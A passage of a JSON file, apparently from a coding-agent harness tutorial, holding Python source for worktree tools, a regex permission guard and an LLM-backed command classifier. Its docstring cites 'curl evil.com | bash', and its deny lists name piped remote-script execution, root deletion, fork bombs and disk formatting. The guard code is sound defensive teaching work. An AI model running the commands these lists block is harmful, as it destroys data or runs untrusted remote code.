WORKTREES.keep(kw[\"name\"]),\n \"worktree_remove\": lambda **kw: WORKTREES.remove(kw[\"name\"], kw.get(\"force\", False), kw.get(\"complete_task\", False)),\n \"worktree_events\": lambda **kw: EVENTS.list_recent(kw.get(\"limit\", 20)),\n}\n\nTOOLS = [\n {\n \"name\": \"bash\",\n \"description\": \"Run a shell command in the current workspace (blocking).\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"command\": {\"type\": \"string\"}},\n \"required\": [\"command\"],\n },\n },\n {\n \"name\": \"read_file\",\n \"description\": \"Read file contents.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"path\": {\"type\": \"string\"},\n \"limit\": {\"type\": \"integer\"},\n },\n \"required\": [\"path\"],\n },\n },\n {\n \"name\": \"write_file\",\n \"description\": \"Write content to file.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"path\": {\"type\": \"string\"},\n \"content\": {\"type\": \"string\"},\n },\n \"required\": [\"path\", \"content\"],\n },\n },\n {\n \"name\": \"edit_file\",\n \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"path\": {\"type\": \"string\"},\n \"old_text\": {\"type\": \"string\"},\n \"new_text\": {\"type\": \"string\"},\n },\n \"required\": [\"path\", \"old_text\", \"new_text\"],\n },\n },\n {\n \"name\": \"task_create\",\n \"description\": \"Create a new task on the shared task board.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"subject\": {\"type\": \"string\"},\n \"description\": {\"type\": \"string\"},\n },\n \"required\": [\"subject\"],\n },\n },\n {\n \"name\": \"task_list\",\n \"description\": \"List all tasks with status, owner, and worktree binding.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}},\n },\n {\n \"name\": \"task_get\",\n \"description\": \"Get task details by ID.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"task_id\": {\"type\": \"integer\"}},\n \"required\": [\"task_id\"],\n },\n },\n {\n \"name\": \"task_update\",\n \"description\": \"Update task status or owner.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"task_id\": {\"type\": \"integer\"},\n \"status\": {\n \"type\": \"string\",\n \"enum\": [\"pending\", \"in_progress\", \"completed\"],\n },\n \"owner\": {\"type\": \"string\"},\n },\n \"required\": [\"task_id\"],\n },\n },\n {\n \"name\": \"task_bind_worktree\",\n \"description\": \"Bind a task to a worktree name.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"task_id\": {\"type\": \"integer\"},\n \"worktree\": {\"type\": \"string\"},\n \"owner\": {\"type\": \"string\"},\n },\n \"required\": [\"task_id\", \"worktree\"],\n },\n },\n {\n \"name\": \"worktree_create\",\n \"description\": \"Create a git worktree and optionally bind it to a task.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\"type\": \"string\"},\n \"task_id\": {\"type\": \"integer\"},\n \"base_ref\": {\"type\": \"string\"},\n },\n \"required\": [\"name\"],\n },\n },\n {\n \"name\": \"worktree_list\",\n \"description\": \"List worktrees tracked in .worktrees/index.json.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}},\n },\n {\n \"name\": \"worktree_status\",\n \"description\": \"Show git status for one worktree.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"name\": {\"type\": \"string\"}},\n \"required\": [\"name\"],\n },\n },\n {\n \"name\": \"worktree_run\",\n \"description\": \"Run a shell command in a named worktree directory.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\"type\": \"string\"},\n \"command\": {\"type\": \"string\"},\n },\n \"required\": [\"name\", \"command\"],\n },\n },\n {\n \"name\": \"worktree_remove\",\n \"description\": \"Remove a worktree and optionally mark its bound task completed.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\"type\": \"string\"},\n \"force\": {\"type\": \"boolean\"},\n \"complete_task\": {\"type\": \"boolean\"},\n },\n \"required\": [\"name\"],\n },\n },\n {\n \"name\": \"worktree_keep\",\n \"description\": \"Mark a worktree as kept in lifecycle state without removing it.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"name\": {\"type\": \"string\"}},\n \"required\": [\"name\"],\n },\n },\n {\n \"name\": \"worktree_events\",\n \"description\": \"List recent worktree/task lifecycle events from .worktrees/events.jsonl.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"limit\": {\"type\": \"integer\"}},\n },\n },\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL,\n system=SYSTEM,\n messages=messages,\n tools=TOOLS,\n max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append(\n {\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n }\n )\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n print(f\"Repo root for s12: {REPO_ROOT}\")\n if not WORKTREES.git_available:\n print(\"Note: Not in a git repo. worktree_* tools will return errors.\")\n\n history = []\n while True:\n try:\n query = input(\"\\033[36ms12 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + }, + { + "id": "s13", + "filename": "s13_permission_guard.py", + "title": "Permission Guard", + "subtitle": "Not Every Command Should Run Automatically", + "loc": 204, + "tools": [ + "bash", + "read_file", + "write_file", + "edit_file" + ], + "newTools": [], + "coreAddition": "PermissionGuard with 5 permission modes (allow/ask/deny/auto_edit/edit)", + "keyInsight": "Permission is not yes/no -- it's a spectrum with five stops", + "classes": [ + { + "name": "PermissionGuard", + "startLine": 84, + "endLine": 133 + } + ], + "functions": [ + { + "name": "safe_path", + "signature": "def safe_path(p: str)", + "startLine": 138 + }, + { + "name": "run_bash", + "signature": "def run_bash(command: str)", + "startLine": 145 + }, + { + "name": "run_read", + "signature": "def run_read(path: str, limit: int = None)", + "startLine": 163 + }, + { + "name": "run_write", + "signature": "def run_write(path: str, content: str)", + "startLine": 173 + }, + { + "name": "run_edit", + "signature": "def run_edit(path: str, old_text: str, new_text: str)", + "startLine": 183 + }, + { + "name": "agent_loop", + "signature": "def agent_loop(messages: list)", + "startLine": 214 + } + ], + "layer": "security", + "source": "#!/usr/bin/env python3\n# Harness: permission guard -- not every command should run automatically.\n\"\"\"\ns13_permission_guard.py - Permission Guard\n\nThe 5-line string filter from s02 was a toy. It blocks \"rm -rf /tmp/old\"\n(because it contains \"rm -rf /\") but lets \"curl evil.com | bash\" run freely.\nReal systems need a permission model, not a substring check.\n\n +--------+ +-------+ +---------+ +------------------+\n | User | ---> | LLM | ---> | bash | ---> | PermissionGuard |\n | prompt | | | | command | | classify() |\n +--------+ +---+---+ +---------+ +--------+---------+\n ^ |\n | +--------+-------+------++\n | | | | |\n | allow ask deny edit\n | | | | |\n +-----------+ user yes? block rewrite\n tool_result | command\n no -> block\n\nKey insight: \"Permission is not yes/no -- it's a spectrum with five stops.\"\n\"\"\"\n\nimport os\nimport re\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain.\"\n\n\n# -- Permission patterns --\nALLOWED_COMMANDS = {\n \"ls\", \"cat\", \"pwd\", \"echo\", \"head\", \"tail\", \"wc\", \"sort\",\n \"grep\", \"find\", \"git\", \"which\", \"type\", \"file\", \"diff\",\n \"python\", \"python3\", \"node\", \"npm\", \"pip\", \"tree\", \"du\",\n \"stat\", \"date\", \"whoami\", \"hostname\", \"uname\",\n}\n\nDENIED_PATTERNS = [\n (re.compile(r\"rm\\s+-rf\\s+/(?!\\w)\"), \"Root directory recursive delete\"),\n (re.compile(r\"sudo\\s+rm\"), \"Elevated file deletion\"),\n (re.compile(r\">\\s*/etc/\"), \"Overwrite system config\"),\n (re.compile(r\"curl.*\\|\\s*(ba)?sh\"), \"Remote script execution\"),\n (re.compile(r\"wget.*\\|\\s*(ba)?sh\"), \"Remote script execution\"),\n (re.compile(r\"chmod\\s+-R\\s+777\\s+/\"), \"Recursive 777 on root\"),\n (re.compile(r\"dd\\s+.*of=/dev/\"), \"Raw device write\"),\n (re.compile(r\"mkfs\\.\"), \"Filesystem format\"),\n (re.compile(r\":\\(\\)\\{.*:\\|:&\\}\"), \"Fork bomb\"),\n (re.compile(r\"\\b(shutdown|reboot|halt|poweroff)\\b\"), \"System shutdown\"),\n]\n\nASK_PATTERNS = [\n (re.compile(r\"rm\\s+\"), \"File deletion\"),\n (re.compile(r\"sudo\\s+\"), \"Elevated privileges\"),\n (re.compile(r\"pip\\s+install\"), \"Package installation\"),\n (re.compile(r\"npm\\s+install\"), \"Package installation\"),\n (re.compile(r\"git\\s+push\"), \"Git push\"),\n (re.compile(r\"git\\s+reset\"), \"Git reset\"),\n (re.compile(r\"docker\\s+rm\"), \"Docker remove\"),\n (re.compile(r\"kill\\s+\"), \"Process termination\"),\n]\n\nEDIT_REWRITE_RULES = [\n (re.compile(r\"rm\\s+-rf\\s+(.+)\"), r\"rm -r \\1\"),\n]\n\n\n# -- PermissionGuard --\nclass PermissionGuard:\n def __init__(self):\n self._denied = DENIED_PATTERNS\n self._ask = ASK_PATTERNS\n self._edit = EDIT_REWRITE_RULES\n\n def classify(self, command: str) -> tuple[str, str]:\n \"\"\"Return (mode, reason).\"\"\"\n # 0. compound command check\n has_compound = bool(re.search(r'[;&|`]|\\$\\(', command))\n # 1. deny -- always check full command\n for pat, reason in self._denied:\n if pat.search(command):\n return (\"deny\", reason)\n # 2. whitelist (single commands only)\n base = command.split()[0] if command.split() else \"\"\n if base in ALLOWED_COMMANDS and not has_compound:\n return (\"allow\", \"\")\n # 3. edit\n for pat, replacement in self._edit:\n if pat.search(command):\n rewritten = pat.sub(replacement, command)\n return (\"edit\", rewritten)\n # 4. ask\n for pat, reason in self._ask:\n if pat.search(command):\n return (\"ask\", reason)\n # 5. default allow\n return (\"allow\", \"\")\n\n def check(self, command: str) -> tuple[bool, str, str]:\n \"\"\"Return (allowed, command_to_run, reason).\"\"\"\n mode, info = self.classify(command)\n if mode == \"deny\":\n return (False, command, info)\n elif mode == \"ask\":\n approved = self._prompt_user(command, info)\n return (approved, command, info)\n elif mode == \"edit\":\n return (True, info, \"Auto-rewritten\")\n else:\n return (True, command, \"\")\n\n def _prompt_user(self, command: str, reason: str) -> bool:\n print(f\"\\033[33m[permission:ask] {reason}\\033[0m\")\n print(f\"\\033[33m Command: {command}\\033[0m\")\n ans = input(\"\\033[33m Allow? (y/n) \\033[0m\").strip().lower()\n return ans == \"y\"\n\n\nGUARD = PermissionGuard()\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef run_bash(command: str) -> str:\n allowed, cmd, reason = GUARD.check(command)\n if not allowed:\n mode, _ = GUARD.classify(command)\n if mode == \"deny\":\n return f\"Permission denied: {reason}\"\n return f\"User declined: {reason}\"\n if cmd != command:\n print(f\"\\033[33m[permission:edit] {command} -> {cmd}\\033[0m\")\n try:\n r = subprocess.run(cmd, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more lines)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes to {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command. Permission-checked: dangerous commands are blocked, some require confirmation.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms13 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + }, + { + "id": "s14", + "filename": "s14_security_classifier.py", + "title": "Security Classifier", + "subtitle": "Let the Model Judge Its Own Commands", + "loc": 223, + "tools": [ + "bash", + "read_file", + "write_file", + "edit_file" + ], + "newTools": [], + "coreAddition": "Two-layer classifier: regex quick-scan + LLM intent classification", + "keyInsight": "Regex sees patterns; the LLM sees intent", + "classes": [ + { + "name": "SecurityClassifier", + "startLine": 89, + "endLine": 139 + }, + { + "name": "PermissionGuard", + "startLine": 140, + "endLine": 162 + } + ], + "functions": [ + { + "name": "safe_path", + "signature": "def safe_path(p: str)", + "startLine": 168 + }, + { + "name": "run_bash", + "signature": "def run_bash(command: str)", + "startLine": 175 + }, + { + "name": "run_read", + "signature": "def run_read(path: str, limit: int = None)", + "startLine": 188 + }, + { + "name": "run_write", + "signature": "def run_write(path: str, content: str)", + "startLine": 198 + }, + { + "name": "run_edit", + "signature": "def run_edit(path: str, old_text: str, new_text: str)", + "startLine": 208 + }, + { + "name": "agent_loop", + "signature": "def agent_loop(messages: list)", + "startLine": 239 + } + ], + "layer": "security", + "source": "#!/usr/bin/env python3\n# Harness: security classifier -- let the model judge its own commands.\n\"\"\"\ns14_security_classifier.py - Security Classifier\n\nRegex patterns from s13 match shapes, not intent. rm -rf build/ and\nrm -rf / look identical to a regex. The LLM can judge context.\n\n Command\n |\n v\n +--------------------+\n | Layer 1: Quick Scan| regex patterns (zero cost)\n +--------+-----------+\n |\n matched? --yes--> deny/ask\n |\n no\n v\n +--------------------+\n | Layer 2: LLM Class | ~10 tokens per call\n +--------+-----------+\n |\n safe / moderate / dangerous\n |\n allow / ask / deny\n\nKey insight: \"Regex sees patterns; the LLM sees intent.\"\n\"\"\"\n\nimport os\nimport re\nimport subprocess\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain.\"\n\n\n# -- Layer 1: regex quick-scan patterns --\nDANGEROUS_PATTERNS = [\n (re.compile(r\"rm\\s+-rf\\s+/(?!\\w)\"), \"Root recursive delete\"),\n (re.compile(r\"sudo\\s+\"), \"Elevated privileges\"),\n (re.compile(r\">\\s*/etc/\"), \"Overwrite system config\"),\n (re.compile(r\"curl.*\\|\\s*(ba)?sh\"), \"Remote code execution\"),\n (re.compile(r\"wget.*\\|\\s*(ba)?sh\"), \"Remote code execution\"),\n (re.compile(r\"chmod\\s+-R\\s+777\\s+/\"), \"Recursive 777\"),\n (re.compile(r\"dd\\s+.*of=/dev/\"), \"Raw device write\"),\n (re.compile(r\"mkfs\\.\"), \"Filesystem format\"),\n (re.compile(r\":\\(\\)\\{.*:\\|:&\\}\"), \"Fork bomb\"),\n (re.compile(r\"\\b(shutdown|reboot|halt|poweroff)\\b\"), \"System shutdown\"),\n (re.compile(r\"crontab\\s+-r\"), \"Delete crontab\"),\n (re.compile(r\"git\\s+push\\s+--force\"), \"Force push\"),\n (re.compile(r\"git\\s+reset\\s+--hard\"), \"Hard reset\"),\n (re.compile(r\"npm\\s+publish\"), \"Publish package\"),\n (re.compile(r\">\\s*/dev/sd\"), \"Write to raw disk\"),\n]\n\nSAFE_COMMANDS = {\n \"ls\", \"cat\", \"pwd\", \"echo\", \"head\", \"tail\", \"wc\", \"sort\",\n \"grep\", \"find\", \"git\", \"which\", \"type\", \"file\", \"diff\",\n \"python\", \"python3\", \"node\", \"npm\", \"pip\", \"tree\", \"du\",\n \"stat\", \"date\", \"whoami\", \"hostname\", \"uname\", \"true\", \"false\",\n}\n\nCLASSIFIER_PROMPT = \"\"\"Classify this shell command's danger level.\nReply with EXACTLY one word: safe, moderate, or dangerous.\n\n- safe: read-only or non-destructive (ls, cat, git status)\n- moderate: writes files but recoverable (rm single file, pip install)\n- dangerous: irreversible or system-wide (rm -rf /, sudo, force push)\n\nCommand: {command}\nContext (last task): {context}\"\"\"\n\n\n# -- SecurityClassifier --\nclass SecurityClassifier:\n def __init__(self, client, model):\n self.client = client\n self.model = model\n # Note: s13 had an \"edit\" mode that rewrites commands (e.g. rm -rf -> rm -r).\n # s14 replaces this with LLM classification: the model judges intent instead\n # of mechanically rewriting patterns. \"moderate\" -> ask the user.\n\n def quick_scan(self, command: str) -> tuple[str, str] | None:\n \"\"\"Layer 1: regex quick-scan. Return (level, reason) or None.\"\"\"\n for pat, reason in DANGEROUS_PATTERNS:\n if pat.search(command):\n return (\"dangerous\", reason)\n return None\n\n def llm_classify(self, command: str, context: str = \"\") -> str:\n \"\"\"Layer 2: LLM classification. Return safe/moderate/dangerous.\"\"\"\n prompt = CLASSIFIER_PROMPT.format(command=command, context=context[-300:])\n try:\n resp = self.client.messages.create(\n model=self.model,\n messages=[{\"role\": \"user\", \"content\": prompt}],\n max_tokens=10,\n )\n answer = resp.content[0].text.strip().lower()\n for level in (\"safe\", \"moderate\", \"dangerous\"):\n if level in answer:\n return level\n except Exception as e:\n print(f\"[classifier:llm] fallback to moderate: {e}\")\n return \"moderate\"\n\n def classify(self, command: str, context: str = \"\") -> dict:\n \"\"\"Full two-layer pipeline.\"\"\"\n # Layer 1\n quick = self.quick_scan(command)\n if quick:\n level, reason = quick\n return {\"level\": level, \"mode\": \"deny\", \"reason\": reason, \"source\": \"pattern\"}\n # Whitelist\n base = command.split()[0] if command.split() else \"\"\n has_compound = bool(re.search(r'[;&|`]|\\$\\(', command))\n if base in SAFE_COMMANDS and not has_compound:\n return {\"level\": \"safe\", \"mode\": \"allow\", \"reason\": \"\", \"source\": \"whitelist\"}\n # Layer 2\n level = self.llm_classify(command, context)\n mode = {\"safe\": \"allow\", \"moderate\": \"ask\", \"dangerous\": \"deny\"}[level]\n return {\"level\": level, \"mode\": mode, \"reason\": f\"LLM: {level}\", \"source\": \"llm\"}\n\n\n# -- PermissionGuard (upgraded with classifier) --\nclass PermissionGuard:\n def __init__(self, classifier: SecurityClassifier = None):\n self.classifier = classifier\n\n def check(self, command: str, context: str = \"\") -> tuple[bool, str, str]:\n \"\"\"Return (allowed, command_to_run, reason).\"\"\"\n result = self.classifier.classify(command, context)\n mode = result[\"mode\"]\n if mode == \"deny\":\n return (False, command, result[\"reason\"])\n elif mode == \"ask\":\n approved = self._prompt_user(command, result[\"reason\"])\n return (approved, command, result[\"reason\"])\n else:\n return (True, command, \"\")\n\n def _prompt_user(self, command: str, reason: str) -> bool:\n print(f\"\\033[33m[security:{reason}]\\033[0m\")\n print(f\"\\033[33m Command: {command}\\033[0m\")\n ans = input(\"\\033[33m Allow? (y/n) \\033[0m\").strip().lower()\n return ans == \"y\"\n\n\nCLASSIFIER = SecurityClassifier(client, MODEL)\nGUARD = PermissionGuard(classifier=CLASSIFIER)\n\n\n# -- Tool implementations --\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef run_bash(command: str) -> str:\n allowed, cmd, reason = GUARD.check(command)\n if not allowed:\n return f\"Security denied: {reason}\"\n try:\n r = subprocess.run(cmd, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more lines)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes to {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command. Two-layer security: regex quick-scan + LLM intent classification.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id, \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms14 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + }, + { + "id": "s17", + "filename": "s17_secure_extension_harness.py", + "title": "Secure Extension Harness", + "subtitle": "Five Layers of Defense, One Loop", + "loc": 459, + "tools": [ + "bash", + "read_file", + "write_file", + "edit_file", + "hook_register", + "hook_list", + "mcp_list_servers", + "mcp_discover" + ], + "newTools": [ + "hook_register", + "hook_list", + "mcp_list_servers", + "mcp_discover" + ], + "coreAddition": "Unified execution pipeline: Hook -> Classify -> Permission -> Execute -> PostHook", + "keyInsight": "Production harnesses aren't about more features -- they're about clear responsibilities at every layer", + "classes": [ + { + "name": "SecurityClassifier", + "startLine": 103, + "endLine": 145 + }, + { + "name": "PermissionGuard", + "startLine": 146, + "endLine": 169 + }, + { + "name": "HookManager", + "startLine": 177, + "endLine": 233 + }, + { + "name": "MCPServerConfig", + "startLine": 238, + "endLine": 248 + }, + { + "name": "MCPClient", + "startLine": 249, + "endLine": 292 + }, + { + "name": "MCPManager", + "startLine": 293, + "endLine": 339 + } + ], + "functions": [ + { + "name": "safe_path", + "signature": "def safe_path(p: str)", + "startLine": 348 + }, + { + "name": "run_bash", + "signature": "def run_bash(command: str)", + "startLine": 355 + }, + { + "name": "run_read", + "signature": "def run_read(path: str, limit: int = None)", + "startLine": 365 + }, + { + "name": "run_write", + "signature": "def run_write(path: str, content: str)", + "startLine": 375 + }, + { + "name": "run_edit", + "signature": "def run_edit(path: str, old_text: str, new_text: str)", + "startLine": 385 + }, + { + "name": "mcp_discover", + "signature": "def mcp_discover()", + "startLine": 416 + }, + { + "name": "execute_tool", + "signature": "def execute_tool(tool_name: str, tool_input: dict, context: dict)", + "startLine": 460 + }, + { + "name": "agent_loop", + "signature": "def agent_loop(messages: list)", + "startLine": 504 + } + ], + "layer": "security", + "source": "#!/usr/bin/env python3\n# Harness: secure extension -- five layers of defense, one loop.\n\"\"\"\ns17_secure_extension_harness.py - Secure Extension Harness\n\ns13-s16 each run as a standalone agent. Real systems need all layers\nworking together inside a single execution pipeline.\n\n LLM calls tool\n |\n v\n +---------------------+\n | [1] Pre-tool Hook | --block--> return error\n +----------+----------+\n v\n +---------------------+\n | [2] Classifier | --deny---> return error\n +----------+----------+\n v\n +---------------------+\n | [3] Permission | --deny---> return error\n | | --ask---> user confirm?\n +----------+----------+\n v\n +---------------------+\n | [4] Execute | built-in handler or MCP\n +----------+----------+\n v\n +---------------------+\n | [5] Post-tool Hook | observe / log\n +----------+----------+\n |\n v\n return result\n\nKey insight: \"Production harnesses aren't about more features -- they're\nabout clear responsibilities at every layer.\"\n\"\"\"\n\nimport json\nimport os\nimport re\nimport subprocess\nimport time\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\n\nSYSTEM = f\"\"\"You are a coding agent at 